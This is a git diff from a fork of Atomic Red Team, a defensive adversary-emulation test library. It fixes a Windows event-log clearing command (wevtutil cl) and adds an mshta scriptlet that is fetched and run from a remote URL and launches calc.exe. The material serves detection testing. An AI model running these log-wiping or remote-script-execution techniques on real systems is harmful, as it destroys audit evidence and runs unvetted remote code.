Merge pull request #2 from redcanaryco/master

Merging upstream changes

CNAME

@@ -0,0 +1 @@
+atomicredteam.io

atomics/T1070/T1070.md

@@ -12,7 +12,7 @@ Defense Bypassed: Anti-virus, Log analysis, Host intrusion prevention systems</b
 
 ## Atomic Tests
 
-- [Atomic Test #1 - Clear  Logs](#atomic-test-1---clear--logs)
+- [Atomic Test #1 - Clear Logs](#atomic-test-1---clear-logs)
 
 - [Atomic Test #2 - FSUtil](#atomic-test-2---fsutil)
 
@@ -21,7 +21,7 @@ Defense Bypassed: Anti-virus, Log analysis, Host intrusion prevention systems</b
 
 <br/>
 
-## Atomic Test #1 - Clear  Logs
+## Atomic Test #1 - Clear Logs
 Clear Windows Event Logs
 
 **Supported Platforms:** Windows
@@ -34,7 +34,7 @@ Clear Windows Event Logs
 
 #### Run it with `command_prompt`!
 ```
-evtutil cl #{log_name}
+wevtutil cl #{log_name}
 ```
 <br/>
 <br/>

atomics/T1070/T1070.yaml

@@ -3,7 +3,7 @@ attack_technique: T1070
 display_name: Indicator Removal on Host
 
 atomic_tests:
-- name: Clear  Logs
+- name: Clear Logs
   description: |
     Clear Windows Event Logs
   supported_platforms:
@@ -16,7 +16,7 @@ atomic_tests:
   executor:
     name: command_prompt
     command: |
-      evtutil cl #{log_name}
+      wevtutil cl #{log_name}
 - name: FSUtil
   description: |
     Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume.

atomics/T1170/T1170.md

@@ -42,7 +42,7 @@ Test execution of a remote script using mshta.exe
 #### Inputs
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
-| file_url | location of the payload | Url | https://www.example.com/mshta.sct|
+| file_url | location of the payload | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/mshta.sct|
 
 #### Run it with `command_prompt`!
 ```

atomics/T1170/T1170.yaml

@@ -12,7 +12,7 @@ atomic_tests:
     file_url:
       description: location of the payload
       type: Url
-      default: https://www.example.com/mshta.sct
+      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/mshta.sct
   executor:
     name: command_prompt
     command: |

atomics/T1170/mshta.sct

@@ -0,0 +1,29 @@
+<?XML version="1.0"?>
+<scriptlet>
+  <!-- Test -->
+  <!-- mshta.exe javascript:a=(GetObject("script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/mshta.sct")).Exec();close(); -->
+
+<registration
+    description="Bandit"
+    progid="Bandit"
+    version="1.00"
+    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
+	>
+
+</registration>
+
+<public>
+    <method name="Exec"></method>
+</public>
+<script language="JScript">
+<![CDATA[
+
+	function Exec()
+	{
+		var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
+	}
+
+]]>
+</script>
+
+</scriptlet>

atomics/index.md

@@ -187,7 +187,7 @@
 - [T1054 Indicator Blocking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
 - [T1066 Indicator Removal from Tools](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
 - [T1070 Indicator Removal on Host](./T1070/T1070.md)
-  - Atomic Test #1: Clear  Logs [windows]
+  - Atomic Test #1: Clear Logs [windows]
   - Atomic Test #2: FSUtil [windows]
   - Atomic Test #3: rm -rf [macos, linux]
 - [T1202 Indirect Command Execution](./T1202/T1202.md)

atomics/windows-index.md

@@ -41,7 +41,7 @@
 - [T1054 Indicator Blocking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
 - [T1066 Indicator Removal from Tools](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
 - [T1070 Indicator Removal on Host](./T1070/T1070.md)
-  - Atomic Test #1: Clear  Logs [windows]
+  - Atomic Test #1: Clear Logs [windows]
   - Atomic Test #2: FSUtil [windows]
 - [T1202 Indirect Command Execution](./T1202/T1202.md)
   - Atomic Test #1: Indirect Command Execution - pcalua.exe [windows]